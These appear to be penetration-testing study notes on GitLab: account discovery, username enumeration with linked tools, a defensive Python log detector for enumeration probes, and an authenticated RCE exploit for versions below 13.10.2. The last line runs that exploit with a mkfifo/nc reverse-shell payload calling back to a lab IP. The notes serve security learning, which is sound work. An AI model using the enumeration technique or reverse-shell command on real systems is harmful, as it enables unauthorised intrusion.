GitLab
- GitLab - web-based Git repository hosting with built-in CI/CD
- written in Go, Ruby on Rails and Vue
- Comparison between GitHub, GitLab and Bitbucket - https://stackshare.io/stackups/bitbucket-vs-github-vs-gitlab
- During pentests, we might find a company's GitHub organisation or self-hosted GitLab/Bitbucket instances
- these might contain sensitive information in cleartext, such as passwords, API tokens and SSH private keys
- GitLab allows for:
- public repositories (require no authentication),
- internal repositories (available to any authenticated user),
- private repositories (restricted to specific members)
- look for public repos; if sign-up is allowed, create an account and look for the repos that become accessible (internal ones).
- usually companies only allow sign-up with an address in the org's email domain, and an admin has to approve the request.
- we'll look into how the GitLab settings can be updated to allow anyone to sign up and access it.
Discovery
- create a new account (if self-registration is enabled)
- look for the projects and groups visible to that account
- find the running version and look for known CVEs for it
Enum
- CVEs - https://www.cvedetails.com/vulnerability-list/vendor_id-13074/Gitlab.html
- some versions have a user-enumeration issue:
- while creating a new user, as soon as a username is entered the app checks whether that username already exists by sending a request, and the response reveals whether the account exists
- https://github.com/dpgg101/GitLabUserEnum
- https://www.exploit-db.com/exploits/49821
- or use Burp Intruder
- As with any type of password spraying attack, we should be mindful of account lockout and other kinds of interruptions.
- login lockout configuration (Devise initializer) - https://gitlab.com/gitlab-org/gitlab-foss/-/blob/master/config/initializers/8_devise.rb
- Running the above will give us a list of valid usernames
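Added example (not from these notes, nor GitLab's own code): a small Python detector for the username-enumeration behaviour described above, run over constructed access-log lines. It assumes the sign-up form's existence check appears in the web server log as GET /users/<name>/exists, and flags any client that probes many distinct usernames inside a short window, which is the signal a defender would alert on.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample access log (nginx combined format) in front of GitLab:
# 10.0.0.5 probes six usernames in three seconds, 10.0.0.9 checks only one.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "GET /users/alice/exists HTTP/1.1" 200 17
10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "GET /users/bob/exists HTTP/1.1" 200 17
10.0.0.5 - - [12/Mar/2024:10:00:02 +0000] "GET /users/carol/exists HTTP/1.1" 200 18
10.0.0.5 - - [12/Mar/2024:10:00:02 +0000] "GET /users/dave/exists HTTP/1.1" 200 18
10.0.0.5 - - [12/Mar/2024:10:00:03 +0000] "GET /users/erin/exists HTTP/1.1" 200 17
10.0.0.5 - - [12/Mar/2024:10:00:03 +0000] "GET /users/frank/exists HTTP/1.1" 200 18
10.0.0.9 - - [12/Mar/2024:10:00:05 +0000] "GET /users/alice/exists HTTP/1.1" 200 17
10.0.0.9 - - [12/Mar/2024:10:05:00 +0000] "GET /users/sign_in HTTP/1.1" 200 9001
"""

# Fields needed from each combined-log line: client IP, timestamp, request path.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*"')
# Assumed path of the sign-up form's username-availability check.
EXISTS_RE = re.compile(r"^/users/(?P<name>[^/]+)/exists$")

def parse_exists_checks(log_text):
    """Return {ip: [(timestamp, username), ...]} for every username-existence probe."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        e = EXISTS_RE.match(m["path"]) if m else None
        if not e:
            continue  # malformed line, or a route other than the existence check
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events[m["ip"]].append((ts, e["name"]))
    return events

def find_enumeration(log_text, threshold=5, window_seconds=60):
    """Flag IPs that probe >= threshold distinct usernames inside a sliding time window."""
    flagged = {}
    for ip, evs in parse_exists_checks(log_text).items():
        evs.sort()  # chronological, so each window starts at one probe and looks forward
        for i, (t0, _) in enumerate(evs):
            names = {n for t, n in evs[i:] if (t - t0).total_seconds() <= window_seconds}
            if len(names) >= threshold:
                flagged[ip] = sorted(names)
                break
    return flagged

if __name__ == "__main__":
    print(find_enumeration(SAMPLE_LOG))
```

Feeding real logs in just means replacing SAMPLE_LOG with the file contents; the threshold and window should be tuned to how often legitimate users hit the sign-up form.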
Attacking
- for versions < 13.10.2 - RCE - https://hackerone.com/reports/1154542
- exploit - https://www.exploit-db.com/exploits/49951
- sign up for a user on the GitLab instance
- start a nc listener
- run the exploit:
python3 gitlab_13_10_2_rce.py -t http://gitlab.inlanefreight.local:8081 -u nickhalden -p admin123 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 8443 >/tmp/f '